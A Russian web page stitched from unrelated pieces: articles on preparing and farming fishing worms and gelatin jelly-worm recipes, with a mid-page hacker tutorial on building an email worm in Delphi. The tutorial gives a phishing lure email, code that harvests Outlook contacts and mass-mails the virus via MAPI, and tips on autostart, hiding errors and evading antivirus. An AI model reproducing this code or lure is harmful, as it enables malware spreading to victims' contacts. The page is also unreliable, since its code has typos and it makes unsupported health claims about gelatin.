Как развести в домашних условиях червей для рыбалки: подходящие виды и уход за ними. Пошаговая инструкция: как создать ферму по разведению червей Шуточная подача фруктов и десертов

Не для кого наверно не секрет, что перед рыбалкой нужно подготовить червей, сделать их более чистыми, упругими и вкусными для рыбы. Ведь чем привлекательнее и подвижнее наш червячок в воде, тем больше будет поклёвок во время рыбалки, а шансы привести большой улов удвоятся. Сегодня мы поговорим как раз о том как приготовить червя перед рыбалкой и дадим Вам несколько проверенных временем советов и рецептов приготовления червя.

За сутки перед рыбалкой необходимое количество червя надо обязательно очистить от всего что накопилось в нём в процессе жизнедеятельности, сделать его вкусным и приятно пахнущим. Способов очистки много, но суть в том, что надо изолировать червя от его привычной среды обитания (земли, навоза) и поместить его в относительно чистую, влажную и подслащённую среду с приятными для рыбы ароматами.

Проверенный рецепт по подготовке червя перед рыбалкой

В этом рецепте нам понадобится:

  • Красные черви;
  • Хлопчатобумажная тряпочка размерами 50 на 50;
  • Спитая чайная заварка;
  • Мята или мелиса, чабрец, укроп (желательно, чтоб эта трава присутствовала на берегу того водоёма на котором вы будете ловить рыбу);
  • Ванилин 2 грамма;
  • Столовая ложка сахара;
  • Ёмкость для смешивания ингредиентов.

В самом начале как можно лучше очищаем наших червей от земли путём перекладывания червей с одного места на другое, удаляя землю в процессе, перебираем так 2-3 раза. После этого Сахар, ванилин высыпаем в нашу тарелку и тщательно перемешиваем, после чего добавляем немного талой или дождевой (отстоянной, но не в коем случае не хлорированной, черви могут погибнуть) воды и мешаем, до получения сахарной кашицы. После помещаем нашу влажную консистенцию в центр уже влажной тряпки немного втирая её в волокна ткани с помощью большой ложки. Далее аккуратно укладываем спитую заварку с травой на место втирания сахара и помещаем наших очищенных червей в центр, заворачиваем тряпку конвертиком и укладываем её в пластиковый или деревянный контейнер.

Хранение приготовленных червей

Не стоит хранить червей в плотно закрытой ёмкости, они скорей всего задохнуться и умрут. Если вы храните их в пластиковой банке то сделайте достаточное количество отверстий по всей поверхности крышки. Но всё же лучше всего хранить червей во влажной тряпочке или носке (желательно хлопок), так воздух будет проникать со всех сторон, червям будет точно комфортно и они останутся такими же привлекательными и подвижными на протяженности всей рыбалки.

Если что пишите комментарии, нам и всем посетителям сайта будет очень интересно узнать ваше мнение.

Сегодня я опишу тебе принцип работы сетевого вируса. Тема, как ты понял, весьма актуальная, поскольку 70% лично моего ящика всегда бывает забита вирусами самого разного пошиба
- от мелких, но злобных VBS-червей до полуторамеговых произведений младших школьников 🙂 Они-то ведь не знают про существование WinAPI 🙂

Для проникновения на компьютер вирусы могут либо использовать баги в ПО юзера (VBS+Outlook= love:)) либо- баги в голове самого юзера. Рассмотрим пример такого вирусного письма:

Subj: Прикол
Привет! Держи крутой прикол, который я тебе (или не тебе, не помню:)) Обещал. Но все равно держи. Не бойся, по-настоящему он ничего не форматирует!
Проверить не забудь, параноик 🙂
Успехов!
Attach: fake_format.exe

Ну так вот: каждый ламероватый интернетчик посылает своим друзьям приколы постоянно, и, соответственно, не очень-то помнит, кому чего обещал; сообщение о "ненастоящем форматировании" переключает мозги жертвы в русло приколов, а слепая вера в антивирусы
- добивает 🙂 Напомню - описанные мной алгоритмы не определяются никакими webами, avp и другими бойцами.

Короче, мне самому уже захотелось запустить этот веселенький прикол. Запускаю 🙂

Error... intel pentium 5 not found!

Ой.. Вроде как не работает? Не, не угадал 🙂 На самом деле вирус тут же перенес свое тело на хард к жертве, записался в автозагрузку, и теперь будет тусоваться в оперативочке (хинт: на медицинском жаргоне "оперативка"- это ОПЕРАТИВНАЯ ХИРУРГИЯ, так что будь осторожен;)) жертвы по принципу, описанному мной в статье "резидентный вирус своими руками". Только вот проверять он будет не запуск файлов, а подключение к сети интернет 🙂 (в исходнике это будет процедура IsOnline, так, на будущее;)). Впрочем, одновременно
мониторить запуск файлов тебе никто не мешает
- это все-таки вирус, хоть и сетевик. Поэтому в логику я включу процедуру InfectFile. Таким образом, мы будем использовать следующие функции и процедуры:

ISONLINE - проверка соединения с инетом
SENDVIRUS - догадайся с трех раз 😉
GETMAILS - получаем адреса из AddresBook аутглюка
INFECTFILES - 🙂
WORKMEMORY - почти то же, что в прошлой статье, но с модификациями.

КОДИНГ

До начала собственно кодига на этот раз необходимы будут долгие предварительные ласки 🙂 Объясняю почему: для чтения адресной книги мы будем обращаться к аутлуку по межпрограммному интерфейсу, а для этого нам нехило поиметь его type library. Вот и делай: projectа import type library, и ищи там…правильно, Outlook express v.9 или какой там у тебя стоит. Девятой считается версия, если не ошибаюсь, из Office2k. Импортировал? Что значит "нет в списке"? Да ладно, бывает. Ищи вручную
- в каталоге с офисом есть файл msoutl.olb. Это она 😉 Теперь в раздел uses пиши outlook_tlb и будешь иметь доступ к самым интимным местам адресной книги 🙂 Ой, какой-то я сегодня озабоченный 😉
В общем, процедура потрошения адресбука должна выглядеть как:

uses
ComObj, outlook_tlb,
Forms;
....
Procedure GETMAILS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s: string;
num, i: Integer;
mails: array of string;

begin
MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength (mails,MyFilder.Items.Count);
for i:= 1 to MyFolder.Items.Count do
begin
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;
end;

Ну как, порадовало тебя написанное? Гы, дальше будет только хуже. Потому что отправка вируса будет на чистом API. А это, как говорит Horrific: "то же самое, что ручной секс. Эффект есть в обоих случаях, но его приходится долго добиваться и нет такого кайфа" 🙂 Ну
так что я тут понаписал? Uses Comobj позволяет нам работать с COM технологией; далее мы только создаем OLE объект аутлука, и циклически выясняем у него список емайлов. Если тебе хочется выяснить еще что-нибудь
- это тоже реально, читай доки - они рулез. Хоть и на английском. Список емайлов пишется в динамический массив из строчек. Его будет юзать функция SendVirus. Вот эта:

function SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i: integer;
s: string;
begin
with MapiRecipDesc do begin
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= nil;
end;

with MapiFileDesc do begin
ulReserved:= 0;
flFlags:= 0;
nPosition:= 0;
lpszPathName:= PChar(Attachment);
lpszFileName:= nil;
lpFileType:= nil;
end;

with MapiMessage do begin
ulReserved:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Subject);
lpszMessageType:= nil;
lpszDateReceived:= nil;
lpszConversationID:= nil;
flFlags:= 0;
lpOriginator:= nil;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
if length(Attachment) > 0 then begin
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
end else begin
nFileCount:= 0;
lpFiles:= nil;
end;
end;

Result:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
or MAPI_LOGON_UI or MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
end;

Ты не опух, пока это читал? Пойди, попей пивка, а то ничего не поймешь.
Выпил? Я тоже 😉 Хорошо, продолжаем. Юзать будешь так:

For i:= 1 to length (mails) do
begin
SendVirus ("",mails[i],"pricol","..");
end;

Здесь мы задействуем функции uses MAPI, поэтому не забудь его объявить. Короче, это
- низкоуровневая работа с почтой. А для работы с почтой, как ты знаешь, надо иметь а)
email получателя б) текст письма в) аттач. Вот я и делаю:
MapiRecipDesc - описываю получателя, MapiFileDesc - аттач,
т.е. наш вирус, MapiMessage - это сообщение, потом я его командой MapiSendMail отправлю в большую жизнь 😉 Ну, не так это оказалось и сложно. Главное понять, что твой самый большой друг
- это не c:\porno, а win32.hlp 🙂

Как же теперь все это словоблудие уложить в суровую логику вируса? Сам разберешься, я тебе уже 2 статьи подряд об этом долблю. И вообще, я вчера отмечал день рождения моей девушки, теперь у меня слегка трещит голова 🙂 Ну ладно, чувство долга сильнее. Just Do It:
первой строчкой проверяешь имя файла, откуда ты стартовал. Если
pricol.exe - значит CopyFile к виндам 🙂 А если стартанул из виндового каталога
- то циклически проверяй подключение к всемирной 😉 сети. Проверяем:

function IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
begin
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Result:= (Res = 0) and (dwCount > 0);
end;

Так. Если все путем, то вперед - тряси адресную книгу и рассылайся. Тут есть две хитрости. Если твое имя
pricol.exe - незамедлительно проверяй соединение. Возможно, пользователь проверяет почту в онлайне. Так наши шансы на рассылку сильно возрастут. До второй хитрости ты уже допер сам,
а именно, при описанном мной раскладе ты будешь все время отправлять одному и тому же юзеру одинаковые письма, только потому, что его не стерли из адресбука. Следовательно, все отработанные адреса записывай в логфайл и постоянно с ним сверяйся. Вроде бы все. Хотя нет. Не забывай ошибкоопасные фрагменты кода заключать в try..except. И ставить ключ {$D-}. Потому что если юзер вдруг поймает ошибку в духе ""FUCK" is not valid integer value", он что-то да заподозрит.

ЗАКЛЮЧЕНИЕ

Эта последняя статья про вирусы, отлаженные под windows 9x. Недавно я форматнул винт, и поставил WindowsXP Professional, поэтому следующие примеры будут уже под него. А ты уже можешь потихоньку покупать Delphi 7, поскольку я свои шестые где-то посеял, и сейчас сижу вообще голый 🙂 Покупать буду, соответственно, седьмые 😉

Следующая статья, наверное будет посвящена стеганографии и ее практической реализации.

Легкий и интересный способ приготовить дома забавных жевательных червячков из желатина, прям как из магазина, только никакой химии! Это очень просто и занятно, к процессу создания своей червячной армии можете привлекать даже детей, им очень понравится!

Рецепт жевательных червячков в домашних условиях №1

Итак, вам понадобятся:

  • Смесь приготовления желе в пакетиках, цвета выбирайте какие нравятся, но лучше всего смотрятся розовые, оранжевые, желтые;,
  • Вода;
  • Трубочки.

Как готовить:

  1. Нужно развести порошок для приготовления желе в горячей воде пока он полностью не растворится, обратите внимание, что воды нужно взять в 1,5 раза меньше, чем указано на упаковке.
  2. Остудите.
  3. Трубочки разрежьте пополам и поставьте в стакан таким образом, чтобы они плотно прилегали и к дну и друг к другу.
  4. Разлейте подготовленную смесь по трубочкам и уберите в холодильник не менее чем на 6-8 часов, например на ночь, для более красивых червячков можем дать следующий совет - наливайте в трубочки понемногу и ставьте на часик в холодильник, потом добавляйте еще, потом уже часиков на 6.
  5. Достаньте палочки, убедившись, что желатин полностью застыл, поместите трубочку на несколько секунд под проточной горячей водой и аккуратно выдавливайте своих червяков.
  6. Выложите их на бумагу для запекания и отправьте в холодильник еще часика на 2.

Рецепт жевательных червячков в домашних условиях из полностью натуральных ингредиентов №2

  • Сахарная пудра 100гр.;
  • Желатин 20гр.;
  • Вода 100мл.;
  • Ягоды 250гр.

Как готовить:

  1. Желатин заранее нужно замочить в воде или соке примерно минут на 40.
  2. Ягоды нужно тщательно перебрать и промыть и перемолоть в блендере или измельчить любым удобным способом.
  3. К ягодному пюре добавляем сахарную пудру и всё тщательно перемешиваем.
  4. Желатин доводим до кипения и добавляем в пюре, тщательно перемешиваем.
  5. В трубочки (смотри пред. Рецепт) заливаем приготовленную массу.
  6. Минимум время застывания - 6-8 часов, дольше - лучше.
  7. Достаем червячков из формочек, по желанию их можно обсыпать сахарной пудрой или сахаром.

В каждом взрослом живет ребенок, который любит повеселиться и ценит простые радости жизни – ведь детям каждый день приносит что-то новое! Давайте разнообразим свой обеденный стол необычными элементами – червяками из желе, которые можно использовать во множестве блюд и вариаций! Такие съедобные элементы дизайна блюд заставят всех присутствующих за столом воскликнуть от восхищения или открыть рот от удивления!

Желеобразная масса после застывания может принимать любые формы. Всё зависит от творческого полета самого кулинара. Впечатляющие червячки из желе, рецепт которых мы сейчас изучим,выглядят как настоящие, особенно если попробовать цветом воспроизвести их внешний вид. Такое блюдо может стать центральным событием вечера и вызвать веселье и шутки за столом.

Ингредиенты

  • + -
  • Пакетики растворимого желе + -

Приготовление

Это очень просто! Вам настолько понравится эта технология, что использовать ее Вы будете часто и для разных блюд. Для приготовления необычных желейных червячков нам нужно запастись пакетиками с полуфабрикатами и трубочками для коктейлей большого диаметра.

  1. Заливаем порошок с фруктовым желе горячей кипяченой водой. Воды следует отмерить меньше, чем указано на упаковке желе, примерно вдвое. После набухания хорошенько размешиваем до получения однородного раствора.
  2. Берем трубочки и связываем их резинкой так, чтобы они плотно прилегали друг к другу. Ставим их в стакан или банку ребристой частью вниз – опять же они плотно должны прилегать ко дну и стенкам стакана.

3. Наливаем жидкость с растворенным в ней порошком-желе в трубочки на 2/3 их высоты. Ставим в холодильник на несколько часов для застывания.

4. Вынимаем застывшее в трубочках желе и опускаем их в горячую воду на несколько секунд. Далее легко выдавливаем содержимое трубочек на тарелку.
5. Используем червяки из желе как самостоятельное блюдо или в качестве дизайнерских элементов в других сладких кушаньях.

* Совет Поваренка:
Цветные червяки очень нравятся детям! Можно разнообразить их внешний вид, заливая в соломинки желе разных цветов. В этом случае, каждый новый желейный раствор заливаем на уже застывший предыдущий. Тогда у нас получатся полосатые червячки из желе.

Розыгрыш на Хеллоуин

Праздник Хеллоуин изобилует розыгрышами. Ладонь, полная дождевых или земляных червей – один из самых доступных! Конечно, наиболее эмоционально на такие розыгрыши реагируют дети и женщины.

Как сделать червяков из желе, чтобы они полностью имитировали дождевых? Достаточно подобрать фруктовый желейный состав подходящего цвета. Например, черничный, черной смородины или сливовый.

Можно также использовать имеющиеся в Ваших закромах варенья из фруктов и ягод. Особенно подошли бы варенья из черной смородины и шелковицы, хотя можно использовать любые.

Но тут технология приготовления несколько иная: берем 2 столовые ложки желатина и растворяем в стакане горячей воды. Отдельно растворяем в стакане воды стакан сахара, доводим до кипения и добавляем варенье. Варим пару минуток, а после остывания процеживаем. На последнем этапе смешиваем оба раствора и получаем желейную массу. Далее разливаем по трубочкам.

Веселого Вам Хеллоуина!

Идеи использования червяков из желе

Конфеты

Содержимое соломинок выдавливаем, выкладываем на плоское блюдо и обсыпаем сахарной пудрой. Пудру можно заменить сахаром, но кристаллы задержится на червячках, только если с легким нажимом их покатать по сахару. Детки очень любят такие вкусняшки. Для более удобного употребления длинную сладкую макаронину можно нарезать более удобными кусочками.

Украшения тортов и пирожных

Из желейных червячков разных цветов можно выложить любой рисунок на поверхности торта: цветы, листики, спиральки, решетки и т.д. А вот пирожные, особенно корзиночки, можно оформить совершенно неожиданным образом. Например, наполнить их белковым кремом, вставить в крем червячки, имитируя волосы, нарисовать глазки и ротик. Вот такие веселые человечки в песочных корзиночках.

Шуточная подача фруктов и десертов

Практически во всех плодах можно сделать дырочки и вставить в них желейных червей. Эффект «разорвавшихся эмоций», особенно если по цвету наша имитация напоминает настоящих червей!

Можно также подать шоколадные десерты в креманках, по цвету напоминающие земляную почву, а из почвы торчат червячки из желе. Потрясающее впечатление, особенно на женщин и детей! Вечер обещает быть незабываемым и весёлым!

Справка:
Желатин – это вытяжка из хрящей и костей животных, т.е. является продуктом животного происхождения. Желатин очень полезен для здоровья наших суставов и костей и является легким профилактическим средством против их появления.

Желатин можно заменить агар-агаром (это водоросли!), которые богаты кальцием и способны абсорбировать из человеческого организма токсины. Желеобразующими свойствами обладает и пектин, который к тому же помогает омолаживанию организма. Купить пектин и агар-агар можно в специализированных отделах магазинов, где продают специи и приправы, или же в зеленых аптеках.

Червяки из желе – отличное, необыкновенное блюдо для нескучных едоков. Мы со смехом кушаем цветные желейные макаронины и при этом лечим свои кости и суставы. Восстанавливаем здоровье и полезной пищей и позитивом!

Приятного вечера и аппетита!

Заядлые рыбаки знают, что улов целиком зависит от наживки и очень хорошо, если не приходится ездить в специальные магазины, а есть возможность набрать ее на собственном участке. Из статьи можно узнать о том, как можно развести в огороде, сарае и даже в квартире разнообразных червей, которых используют для рыбалки.

Какие черви используются рыбаками

Не все черви, с которыми можно столкнуться в наших краях, подходят для наживки. Только несколько разновидностей пользуются спросом у рыбаков.

  1. Выползки или дождевые черви. Название они получили благодаря свойству появляться на поверхности почвы выползая из глубоких норок только после дождя. Это крупные черви, среди которых встречаются настоящие гиганты до 30 см в длину. В качестве наживки выползки подходят для ловли практически всех пресноводных рыб.
  2. Навозные черви. Судя по названию можно сразу догадаться об их месте обитания. Окрашены эти создания в темно-красный цвет, имеют небольшие размеры и живут колониями, что значительно облегчает их сбор. Замечательно привлекают рыбу .
  3. Подлистники. Живут в кучах листвы, под бревнами и камнями. Размер средний, окраска темно-фиолетовая. Из недостатков можно отметить свойство легко обрываться с крючка.
  4. Красные калифорнийские черви. Эта разновидность была получена искусственным путем от вышеописанных навозных особей. В отличие от неприхотливых родителей при выращивании им требуются определенные условия: тишина, покой, тепло и подходящая влажность почвы.

Все перечисленные виды, при создании им определенных условий, достаточно хорошо живут и быстро размножаются на обычных садовых участках. В холодное время года разводить червей можно в помещении.

Как разводить червей выползков

В естественном виде эти черви обитают в почве, где можно найти остатки растительной органики, чем они и питаются. Пропуская через свой кишечник землю выползки превращают ее в питательный гумус, а благодаря подземным ходам, проделанным ими же во время передвижения, значительно улучшается воздухообмен в почве. Огородниками давно подмечено, что растения лучше растут там, где обитают дождевые черви.

Соорудить на участке червятник и разводить в нем выползков достаточно просто. Если это теплое время года, то достаточно вырыть небольшую траншею и заполнить ее садовой землей в смеси с полусгнившими листьями и перегноем. Через несколько дней там можно будет обнаружить достаточное для рыбалки количество особей.

Внимание! При обустройстве червятника важно следить чтобы в почву не попал пепел или угли. Черви этого не переносят.

Когда наступают холода черви могут содержаться в сарае, на балконе, в подвале и т.д. Главное условие для них - температура в помещении должна быть не ниже +15°С.

Делают червятник так:

  1. Берут неглубокий (около 20 см) деревянный ящик с просветами по бокам.
  2. Изнутри его выстилают воздухопроницаемым материалом (мешковиной, лутрасилом и т.д).
  3. Емкость заполняют землей, смешанной с нарубленным сеном, остатками листьев.
  4. Субстрат увлажняют и помещают на его поверхность 20-30 особей.

В дальнейшем нужно следить за влажностью почвы и регулярно подсыпать в ящик растительные остатки и другую пищу, которую едят черви.

Совет. Землю в ящике следует регулярно перемешивать. Так равномерно распределяется влага и корм. К тому же, благодаря этому действию черви не сбиваются в плотные клубки, внутри которых могут гибнуть.

Как выращивать навозных и калифорнийских червей для рыбалки

Ящик для этих разновидностей готовят так же, как и для дождевых. Субстрат, в котором будут жить красные черви, готовят немного иного состава. В него входят:

  • солома;
  • навоз;
  • опилки;
  • сено;
  • земля.

Все составляющие хорошо перемешивают, помещают в ящики, увлажняют и хорошо трамбуют.

Внимание! Среда, где обитают черви должна быть всегда влажной. При показателе 22% жители червятника могут погибнуть.

Кислотность почвы, в которой планируется разводить питомцев, должна быть в пределах рН6-рН7. При показателях рН9 или рН5 черви не живут. Температура в помещении с червятниками должна быть около +24°С. При похолодании черви начинают меньше есть, зарываются поглубже в почву и погружаются в сон.

Кормят питомцев всевозможными растительными и пищевыми отходами. Подойдут остатки хлеба, различных каш, сухой геркулес и отруби.

Совет. Чтобы черви лучше размножались в их рацион нужно ввести молочные продукты: нежирный творог, кефир, простоквашу.

Разведение червей дома - дело более хлопотное, чем их покупка в магазине. Зато, при наличии домашней червефермы под рукой всегда будет неограниченное количество отличной наживки. А это, как ни крути, уже половина успеха рыбной ловли.

Как разводить червей дома: видео

Loading...Loading...